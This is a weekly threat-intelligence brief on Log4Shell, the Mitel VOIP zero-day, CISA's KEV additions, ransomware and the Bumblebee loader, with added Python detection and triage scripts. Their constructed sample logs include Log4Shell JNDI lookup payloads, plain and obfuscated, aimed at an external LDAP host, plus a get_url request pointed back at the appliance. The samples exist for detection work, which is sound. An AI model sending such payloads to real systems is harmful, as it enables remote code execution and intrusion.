Cyber Intel Brief: June 23 – 29, 2022

Exploited Vulnerabilities

Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems

What You Need To Know:

CISA and the United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to warn organizations “that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.”
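The advisory concerns unpatched Log4j lookups, so the practical defender question is whether JNDI lookup strings are reaching your Horizon or UAG hosts. The following is an added example, not code from the advisory, CISA, or VMware: it de-obfuscates the nested `${lower:...}` / `${...:-x}` lookup forms that were used to evade simple substring matching, then flags any access-log line that still contains a `${jndi:` lookup. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory): two benign requests,
# one carrying a plain JNDI lookup in the User-Agent field, and one using the nested
# ${lower:...} form that was used to slip past naive substring matching.
SAMPLE_LOGS = [
    '10.0.0.5 - - [24/Jun/2022:10:01:02 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Jun/2022:10:01:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [24/Jun/2022:10:02:15 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23/a}"',
    '198.51.100.23 - - [24/Jun/2022:10:02:41 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.23/a}"',
]

# Innermost Log4j lookups whose result is a literal: ${lower:X}, ${upper:X},
# and the default-value form ${anything:-X} (which covers ${::-X} and ${env:NOPE:-X}).
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # group 1: ${lower:X} / ${upper:X}
    r"|\$\{[^${}]*:-([^${}]*)\}",           # group 2: ${...:-X}
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups inside-out until nothing changes,
    so that ${${lower:j}ndi:...} becomes ${jndi:...}. max_rounds bounds hostile input."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every hit; line numbers are 1-indexed."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append((n, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for n, shown in scan(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup -> {shown}")
```

A hit on a patched host is still worth a look, since it shows who is scanning for the flaw; a hit on an unpatched Horizon or UAG server should be treated as a probable compromise and handled per the advisory's incident response guidance.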


Exploited Vulnerabilities

CrowdStrike Identifies Novel Exploit in VOIP Appliance

What You Need To Know:

During an incident response engagement, CrowdStrike discovered a threat actor exploiting a zero-day vulnerability in a Mitel VOIP appliance. The vulnerability is now tracked as CVE-2022-29499 and affects the Mitel VOIP appliances SA 100, SA 400, and Virtual SA. According to CrowdStrike’s analysis, all malicious activity originated from the internal IP address associated with the Mitel VOIP appliance. To exploit the appliance, the threat actor sent two GET requests: “The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation,” resulting in a reverse shell.
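The two observations in CrowdStrike's write-up, a `get_url` parameter pointed back at the device and a follow-up request whose source is the appliance's own address, both show up in ordinary web-server logs. The following is an added example, not CrowdStrike's or Mitel's code, that triages Apache combined-format log lines for those two indicators. The appliance address `192.0.2.10` and the endpoint name `/example.php` are placeholders (the brief does not name the PHP file), and the log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed: the appliance's own address. In practice take this from your asset inventory.
APPLIANCE_IP = ipaddress.ip_address("192.0.2.10")

# Constructed access-log lines. Line 1 is an external request that points get_url at the
# device itself; line 2 is the follow-up request the device then makes to itself;
# lines 3 and 4 are benign traffic, including a legitimate external get_url value.
SAMPLE_LOGS = [
    '203.0.113.44 - - [25/Jun/2022:03:14:07 +0000] "GET /example.php?get_url=http://127.0.0.1/local_file HTTP/1.1" 200 211 "-" "curl/7.68.0"',
    '192.0.2.10 - - [25/Jun/2022:03:14:08 +0000] "GET /example.php HTTP/1.1" 200 211 "-" "-"',
    '203.0.113.9 - - [25/Jun/2022:03:15:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.1.1.20 - - [25/Jun/2022:03:16:22 +0000] "GET /example.php?get_url=https://updates.example.net/feed HTTP/1.1" 200 211 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def points_at_device(url: str) -> bool:
    """True when a URL resolves back to the appliance: file://, localhost,
    a loopback address, or the appliance's own IP."""
    parts = urlsplit(url)
    if parts.scheme.lower() == "file":
        return True
    host = parts.hostname or ""
    if host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:          # a hostname rather than a literal address
        return False
    return addr.is_loopback or addr == APPLIANCE_IP


def triage(lines):
    """Return (line_number, reason) for each line matching one of the two indicators."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query).get("get_url", []):
            if points_at_device(value):
                findings.append((n, f"get_url points at the device itself: {value}"))
        try:
            src = ipaddress.ip_address(m["ip"])
        except ValueError:
            src = None
        if src == APPLIANCE_IP:
            findings.append((n, "request originated from the appliance's own address"))
    return findings


if __name__ == "__main__":
    for n, reason in triage(SAMPLE_LOGS):
        print(f"line {n}: {reason}")
```

The second indicator is the more durable one: whatever the parameter name, a VOIP appliance sending HTTP requests to its own management interface is rarely expected behaviour, which is why the write-up's observation that all activity came from the appliance's internal address is itself a detection opportunity.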


Exploited Vulnerabilities

CISA Adds Eight Vulnerabilities to its Known Exploited Catalog

What You Need To Know:

Based on evidence of active exploitation, CISA has added the eight vulnerabilities listed on the next page to its Known Exploited Vulnerabilities Catalog. The affected software includes multiple Apple products and Red Hat’s Polkit (an out-of-bounds read and write vulnerability). Threat actors frequently use these vulnerabilities as an attack vector, posing a serious threat to organizations. The Threat Intel Team at Deepwatch will continue to monitor new vulnerabilities added to the Catalog and keep customers informed via the weekly Cyber Intel Brief.
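Monitoring the Catalog is mechanical enough to script: CISA publishes it as a JSON feed, so a weekly check amounts to diffing two snapshots, filtering to vendors you actually run, and sorting by remediation due date. The following is an added example, not Deepwatch's or CISA's code. The two snapshots are constructed in the shape of the KEV feed; CVE-2021-44228 and CVE-2022-29499 are the two CVEs discussed in this brief, and the remaining IDs are obvious placeholders rather than real catalog entries.

```python
import json
from datetime import date

# Constructed snapshots shaped like CISA's KEV JSON feed: a "vulnerabilities" list whose
# entries carry cveID, vendorProject, product, vulnerabilityName, dateAdded and dueDate.
# Vendor/product text mirrors this brief; the CVE-PLACEHOLDER IDs are not real entries.
LOG4J_ENTRY = {
    "cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
    "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
    "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
}

PREVIOUS_SNAPSHOT = json.dumps({
    "catalogVersion": "2022.06.22",
    "vulnerabilities": [LOG4J_ENTRY],
})

CURRENT_SNAPSHOT = json.dumps({
    "catalogVersion": "2022.06.27",
    "vulnerabilities": [
        LOG4J_ENTRY,
        {"cveID": "CVE-2022-29499", "vendorProject": "Mitel", "product": "VOIP appliance",
         "vulnerabilityName": "Mitel VOIP appliance vulnerability (constructed entry)",
         "dateAdded": "2022-06-27", "dueDate": "2022-07-18"},
        {"cveID": "CVE-PLACEHOLDER-0001", "vendorProject": "Apple", "product": "Multiple Products",
         "vulnerabilityName": "Placeholder Apple entry", "dateAdded": "2022-06-27", "dueDate": "2022-07-18"},
        {"cveID": "CVE-PLACEHOLDER-0002", "vendorProject": "Red Hat", "product": "Polkit",
         "vulnerabilityName": "Red Hat Polkit Out-of-Bounds Read and Write Vulnerability",
         "dateAdded": "2022-06-27", "dueDate": "2022-07-18"},
    ],
})


def load(snapshot: str) -> dict:
    """Index a snapshot by CVE ID."""
    return {v["cveID"]: v for v in json.loads(snapshot)["vulnerabilities"]}


def new_entries(previous: str, current: str) -> list[dict]:
    """Entries present in the current snapshot but absent from the previous one,
    soonest due date first."""
    prev, cur = load(previous), load(current)
    added = [v for k, v in cur.items() if k not in prev]
    return sorted(added, key=lambda v: (v["dueDate"], v["cveID"]))


def matching_inventory(entries: list[dict], inventory: set[str]) -> list[dict]:
    """Keep entries whose vendorProject is in the organisation's vendor list (case-insensitive)."""
    wanted = {v.lower() for v in inventory}
    return [e for e in entries if e["vendorProject"].lower() in wanted]


def days_until_due(entry: dict, today: date) -> int:
    return (date.fromisoformat(entry["dueDate"]) - today).days


def report(previous: str, current: str, inventory: set[str], today: date) -> list[str]:
    """One line per newly added entry that touches a vendor you run."""
    lines = []
    for e in matching_inventory(new_entries(previous, current), inventory):
        d = days_until_due(e, today)
        urgency = "OVERDUE" if d < 0 else f"{d} days left"
        lines.append(f"{e['cveID']} {e['vendorProject']} {e['product']}: {urgency} (due {e['dueDate']})")
    return lines


if __name__ == "__main__":
    for line in report(PREVIOUS_SNAPSHOT, CURRENT_SNAPSHOT, {"Apple", "Mitel"}, date(2022, 6, 29)):
        print(line)
```

The vendor filter is the part worth tuning: KEV due dates bind US federal agencies, but the "is it in KEV" signal is useful to anyone, and matching against your own inventory keeps the weekly list short enough to act on.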


Ransomware

Common TTPs of Modern Ransomware Groups

What You Need To Know:

In a recent 137-page report, researchers from Kaspersky describe the many stages of a ransomware deployment, how attackers employ RATs and other tools throughout each stage, and their goals at each point. The report also introduces the reader to the SIGMA detection rules they developed and offers a visual approach to protecting against targeted ransomware attacks, using examples from the most well-known groups.


Ransomware

LockBit Ransomware Disguised as Copyright-Claim Emails

What You Need To Know:

LockBit ransomware has been observed being distributed by phishing emails posing as copyright claims, according to the South Korean cybersecurity firm ASEC. The phishing emails carried a ZIP file that, when decompressed, contains a file in the proprietary “.alz” compressed format. The LockBit ransomware executable is hidden within this compressed file and uses a PDF icon to pass as a document.
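The lure described above relies on two things a mail gateway or analyst can check without trusting appearances: the outer ZIP contains a further archive in an uncommon format, and the payload's PDF icon is only a resource inside a PE file, so the first bytes of the member give it away. The following is an added example, not ASEC's code, that triages a ZIP attachment for nested archives, executables whose extension claims otherwise, and document-style double extensions. The sample ZIP is constructed in memory; its `.alz` member is filler bytes standing in for the real inner archive.

```python
import io
import os
import zipfile

# Extensions that mean "there is another layer to unpack" (.alz and .egg are ALZip formats).
NESTED_ARCHIVE_EXTS = {".alz", ".egg", ".zip", ".rar", ".7z", ".iso", ".img", ".gz"}
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".cpl"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Executable file signatures checked on the member's first bytes, not its name or icon.
MAGIC = {b"MZ": "Windows PE executable", b"\x7fELF": "ELF executable"}


def classify_member(name: str, head: bytes) -> list[str]:
    """Findings for one archive member given its name and first few bytes."""
    root, ext = os.path.splitext(name.lower())
    findings = []
    if ext in NESTED_ARCHIVE_EXTS:
        findings.append(f"{name}: nested archive ({ext}); unpack and triage its contents too")
    for magic, desc in MAGIC.items():
        if head.startswith(magic):
            if ext in EXECUTABLE_EXTS:
                findings.append(f"{name}: {desc}")
            else:
                findings.append(f"{name}: {desc} carrying a non-executable extension '{ext}'")
    inner_ext = os.path.splitext(root)[1]
    if ext in EXECUTABLE_EXTS and inner_ext in DOCUMENT_EXTS:
        findings.append(f"{name}: document-like double extension ('{inner_ext}{ext}')")
    return findings


def triage_zip(data: bytes) -> list[str]:
    """Walk a ZIP held in memory and collect findings for every file member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)
            findings.extend(classify_member(info.filename, head))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample resembling the lure's outer layer. 'copyright_claim.alz' is
    opaque filler, 'claim.pdf.exe' starts with the PE 'MZ' signature and is otherwise
    filler, and 'invoice.pdf' is a harmless stand-in for a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("copyright_claim.alz", b"\x00" * 64)
        zf.writestr("claim.pdf.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("invoice.pdf", b"%PDF-1.4\n%filler")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

The nested-archive finding is deliberately a hand-off rather than a verdict: Python's standard library cannot open `.alz`, so the triage's job is to make sure that layer is unpacked and inspected with the same checks rather than waved through because the outer ZIP looked clean.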


Malware

Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-Crime Ecosystem

What You Need To Know:

Symantec recently analyzed tools used in attacks involving Bumblebee, a new malware loader, and its analysis has linked the loader to a number of ransomware operations including Conti, Quantum, and MountLocker. The tactics, techniques, and procedures (TTPs) used in these attacks support Symantec’s hypothesis that Bumblebee may be a replacement for Trickbot and BazarLoader, based on overlapping activity between Bumblebee and older attacks that have been linked to those loaders.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “may” and “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or remote event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
